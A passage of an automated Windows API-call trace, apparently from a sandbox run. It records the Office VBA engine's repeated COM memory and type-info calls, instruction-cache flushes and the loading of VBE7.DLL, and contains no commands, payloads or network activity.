[0045.744] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.744] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.744] GetCurrentProcess () returned 0xffffffffffffffff [0045.744] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.744] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.744] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x2037f0, pDummy=0x0 | out: ppTypeAttr=0x2037f0, pDummy=0x0) returned 0x0 [0045.744] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.744] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.744] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.744] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.744] GetCurrentProcess () returned 0xffffffffffffffff [0045.744] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.744] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.744] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203a30, pDummy=0x0 | out: ppTypeAttr=0x203a30, pDummy=0x0) returned 0x0 [0045.744] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.744] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x203208, pDummy=0x2032c4 | out: ppTypeAttr=0x203208, pDummy=0x2032c4*=0x30000) returned 0x0 [0045.744] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.744] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.744] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.744] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.744] GetCurrentProcess () returned 0xffffffffffffffff [0045.744] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.744] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.744] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203210, pDummy=0x0 | out: ppTypeAttr=0x203210, pDummy=0x0) returned 0x0 [0045.744] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.744] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.744] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.744] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.744] GetCurrentProcess () returned 0xffffffffffffffff [0045.744] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.744] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.744] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203450, pDummy=0x0 | out: ppTypeAttr=0x203450, pDummy=0x0) returned 0x0 [0045.745] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.745] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.745] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.745] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.745] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.745] GetCurrentProcess () returned 0xffffffffffffffff [0045.745] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.745] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.745] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203690, pDummy=0x0 | out: ppTypeAttr=0x203690, pDummy=0x0) returned 0x0 [0045.745] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.745] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.745] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.745] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.745] GetCurrentProcess () returned 0xffffffffffffffff [0045.745] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.745] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.745] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x2038d0, pDummy=0x0 | out: ppTypeAttr=0x2038d0, pDummy=0x0) returned 0x0 [0045.745] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.745] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.745] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.745] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.745] GetCurrentProcess () returned 0xffffffffffffffff [0045.745] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.745] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.745] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203b10, pDummy=0x0 | out: ppTypeAttr=0x203b10, pDummy=0x0) returned 0x0 [0045.745] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.745] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2032e8, pDummy=0x2033a4 | out: ppTypeAttr=0x2032e8, pDummy=0x2033a4*=0x30000) returned 0x0 [0045.745] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.745] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.745] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.745] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.745] GetCurrentProcess () returned 0xffffffffffffffff [0045.745] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.745] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.745] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2032f0, pDummy=0x0 | out: ppTypeAttr=0x2032f0, pDummy=0x0) returned 0x0 [0045.745] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.745] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.746] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.746] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.746] GetCurrentProcess () returned 0xffffffffffffffff [0045.746] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.746] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.746] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203530, pDummy=0x0 | out: ppTypeAttr=0x203530, pDummy=0x0) returned 0x0 [0045.746] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.746] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.746] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.746] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.746] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.746] GetCurrentProcess () returned 0xffffffffffffffff [0045.746] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.746] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.746] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203770, pDummy=0x0 | out: ppTypeAttr=0x203770, pDummy=0x0) returned 0x0 [0045.746] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.746] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.746] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.746] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.746] GetCurrentProcess () returned 0xffffffffffffffff [0045.746] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.746] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.746] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x2039b0, pDummy=0x0 | out: ppTypeAttr=0x2039b0, pDummy=0x0) returned 0x0 [0045.746] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.746] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.746] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.746] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.746] GetCurrentProcess () returned 0xffffffffffffffff [0045.746] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.746] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.746] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203bf0, pDummy=0x0 | out: ppTypeAttr=0x203bf0, pDummy=0x0) returned 0x0 [0045.746] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.746] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2033c8, pDummy=0x203484 | out: ppTypeAttr=0x2033c8, pDummy=0x203484*=0x30000) returned 0x0 [0045.746] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.746] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.747] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.747] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.747] GetCurrentProcess () returned 0xffffffffffffffff [0045.747] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.747] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.747] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2033d0, pDummy=0x0 | out: ppTypeAttr=0x2033d0, pDummy=0x0) returned 0x0 [0045.747] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.747] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.747] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.747] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.747] GetCurrentProcess () returned 0xffffffffffffffff [0045.747] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.747] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.747] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203610, pDummy=0x0 | out: ppTypeAttr=0x203610, pDummy=0x0) returned 0x0 [0045.747] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.747] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.747] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.747] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.747] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.747] GetCurrentProcess () returned 0xffffffffffffffff [0045.747] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.747] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.747] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203850, pDummy=0x0 | out: ppTypeAttr=0x203850, pDummy=0x0) returned 0x0 [0045.747] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.747] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.747] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.747] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.747] GetCurrentProcess () returned 0xffffffffffffffff [0045.747] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.747] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.747] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203a90, pDummy=0x0 | out: ppTypeAttr=0x203a90, pDummy=0x0) returned 0x0 [0045.747] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.747] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.747] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.747] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.747] GetCurrentProcess () returned 0xffffffffffffffff [0045.747] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.747] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.748] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203cd0, pDummy=0x0 | out: ppTypeAttr=0x203cd0, pDummy=0x0) returned 0x0 [0045.748] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.748] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2033a8, pDummy=0x203464 | out: ppTypeAttr=0x2033a8, pDummy=0x203464*=0x0) returned 0x0 [0045.748] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.748] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.748] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.748] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.748] GetCurrentProcess () returned 0xffffffffffffffff [0045.748] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.748] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.748] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2033b0, pDummy=0x0 | out: ppTypeAttr=0x2033b0, pDummy=0x0) returned 0x0 [0045.748] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.748] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.748] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.748] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.748] GetCurrentProcess () returned 0xffffffffffffffff [0045.748] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.748] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.748] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x2035f0, pDummy=0x0 | out: ppTypeAttr=0x2035f0, pDummy=0x0) returned 0x0 [0045.748] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.748] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.748] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.748] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.748] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.748] GetCurrentProcess () returned 0xffffffffffffffff [0045.748] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.748] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.748] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203830, pDummy=0x0 | out: ppTypeAttr=0x203830, pDummy=0x0) returned 0x0 [0045.748] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.748] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.748] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.748] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.748] GetCurrentProcess () returned 0xffffffffffffffff [0045.748] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.748] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.748] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203a70, pDummy=0x0 | out: ppTypeAttr=0x203a70, pDummy=0x0) returned 0x0 [0045.748] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.749] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.749] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.749] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.749] GetCurrentProcess () returned 0xffffffffffffffff [0045.749] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.749] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.749] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203cb0, pDummy=0x0 | out: ppTypeAttr=0x203cb0, pDummy=0x0) returned 0x0 [0045.749] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.749] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2033a8, pDummy=0x203464 | out: ppTypeAttr=0x2033a8, pDummy=0x203464*=0x0) returned 0x0 [0045.749] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.749] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.749] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.749] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.749] GetCurrentProcess () returned 0xffffffffffffffff [0045.749] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.749] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.749] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2033b0, pDummy=0x0 | out: ppTypeAttr=0x2033b0, pDummy=0x0) returned 0x0 [0045.749] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.749] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.749] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.749] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.749] GetCurrentProcess () returned 0xffffffffffffffff [0045.749] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.749] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.749] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x2035f0, pDummy=0x0 | out: ppTypeAttr=0x2035f0, pDummy=0x0) returned 0x0 [0045.749] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.749] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.750] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.750] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.750] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.750] GetCurrentProcess () returned 0xffffffffffffffff [0045.750] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.750] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.750] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203830, pDummy=0x0 | out: ppTypeAttr=0x203830, pDummy=0x0) returned 0x0 [0045.750] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.750] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.750] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.750] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.750] GetCurrentProcess () returned 0xffffffffffffffff [0045.750] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.750] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.750] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203a70, pDummy=0x0 | out: ppTypeAttr=0x203a70, pDummy=0x0) returned 0x0 [0045.750] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.750] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.750] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.750] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.750] GetCurrentProcess () returned 0xffffffffffffffff [0045.750] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.750] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.750] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203cb0, pDummy=0x0 | out: ppTypeAttr=0x203cb0, pDummy=0x0) returned 0x0 [0045.750] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.750] IMalloc:Free (This=0x7feff045380, pv=0x7f18970) [0045.750] GetCurrentProcess () returned 0xffffffffffffffff [0045.750] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b458, dwSize=0x8) returned 1 [0045.750] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d94e8, dwSize=0x8) returned 1 [0045.750] GetCurrentProcess () returned 0xffffffffffffffff [0045.750] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d95a0, dwSize=0x8) returned 1 [0045.750] GetCurrentProcess () returned 0xffffffffffffffff [0045.750] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9b68, dwSize=0x8) returned 1 [0045.750] GetCurrentProcess () returned 0xffffffffffffffff [0045.750] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9c28, dwSize=0x8) returned 1 [0045.750] GetCurrentProcess () returned 0xffffffffffffffff [0045.750] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9ce8, dwSize=0x8) returned 1 [0045.750] GetCurrentProcess () returned 0xffffffffffffffff [0045.751] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813aee8, dwSize=0x8) returned 1 [0045.751] GetCurrentProcess () returned 0xffffffffffffffff [0045.751] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813afb0, dwSize=0x8) returned 1 [0045.751] GetCurrentProcess () returned 0xffffffffffffffff [0045.751] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b148, dwSize=0x8) returned 1 [0045.751] GetCurrentProcess () returned 0xffffffffffffffff [0045.751] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b218, dwSize=0x8) returned 1 [0045.751] GetCurrentProcess () returned 0xffffffffffffffff [0045.751] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b390, dwSize=0x8) returned 1 [0045.751] GetCurrentProcess () returned 0xffffffffffffffff [0045.751] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b458, dwSize=0x8) returned 1 [0045.751] SetErrorMode (uMode=0x8001) returned 0x8001 [0045.751] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0045.751] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0045.752] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c49000001bd) returned 1 [0045.752] SetErrorMode (uMode=0x8001) returned 0x8001 [0045.752] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x204) returned 0x7fee3dfd760 [0045.752] GetCurrentProcess () returned 0xffffffffffffffff [0045.752] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b7f4, dwSize=0x3b) returned 1 [0045.752] RtlLookupFunctionEntry (in: ControlPc=0x813b7f4, ImageBase=0x2046f8, HistoryTable=0x204700 | out: ImageBase=0x2046f8, HistoryTable=0x204700) returned 0x0 [0045.752] VirtualProtect (in: lpAddress=0x813b7f4, dwSize=0x3c, flNewProtect=0x40, lpflOldProtect=0x2047fc | out: lpflOldProtect=0x2047fc*=0x4) returned 1 [0045.752] RtlAddFunctionTable (FunctionTable=0x813b83c, EntryCount=0x1, BaseAddress=0x813b700, TargetGp=0x2047fc) returned 1 [0045.752] SetErrorMode (uMode=0x8001) returned 0x8001 [0045.752] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0045.752] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0045.753] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c49000001be) returned 1 [0045.753] SetErrorMode (uMode=0x8001) returned 0x8001 [0045.753] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x2cc) returned 0x7fee3fd24c8 [0045.753] GetCurrentProcess () returned 0xffffffffffffffff [0045.753] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b8ec, dwSize=0x4b) returned 1 [0045.754] RtlLookupFunctionEntry (in: ControlPc=0x813b8ec, ImageBase=0x2046f8, HistoryTable=0x204700 | out: ImageBase=0x2046f8, HistoryTable=0x204700) returned 0x0 [0045.754] VirtualProtect (in: lpAddress=0x813b8ec, dwSize=0x4c, flNewProtect=0x40, lpflOldProtect=0x2047fc | out: lpflOldProtect=0x2047fc*=0x40) returned 1 [0045.754] RtlAddFunctionTable (FunctionTable=0x813b944, EntryCount=0x1, BaseAddress=0x813b800, TargetGp=0x2047fc) returned 1 [0045.754] GetCurrentProcess () returned 0xffffffffffffffff [0045.754] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813ba0c, dwSize=0x4c) returned 1 [0045.754] RtlLookupFunctionEntry (in: ControlPc=0x813ba0c, ImageBase=0x204758, HistoryTable=0x204760 | out: ImageBase=0x204758, HistoryTable=0x204760) returned 0x0 [0045.754] VirtualProtect (in: lpAddress=0x813ba0c, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x20485c | out: lpflOldProtect=0x20485c*=0x40) returned 1 [0045.754] RtlAddFunctionTable (FunctionTable=0x813ba68, EntryCount=0x1, BaseAddress=0x813b900, TargetGp=0x20485c) returned 1 [0045.754] GetCurrentProcess () returned 0xffffffffffffffff [0045.754] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813baac, dwSize=0x4c) returned 1 [0045.754] RtlLookupFunctionEntry (in: ControlPc=0x813baac, ImageBase=0x204758, HistoryTable=0x204760 | out: ImageBase=0x204758, HistoryTable=0x204760) returned 0x0 [0045.754] VirtualProtect (in: lpAddress=0x813baac, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x20485c | out: lpflOldProtect=0x20485c*=0x40) returned 1 [0045.754] RtlAddFunctionTable (FunctionTable=0x813bb08, EntryCount=0x1, BaseAddress=0x813ba00, TargetGp=0x20485c) returned 1 [0045.754] GetCurrentProcess () returned 0xffffffffffffffff [0045.754] 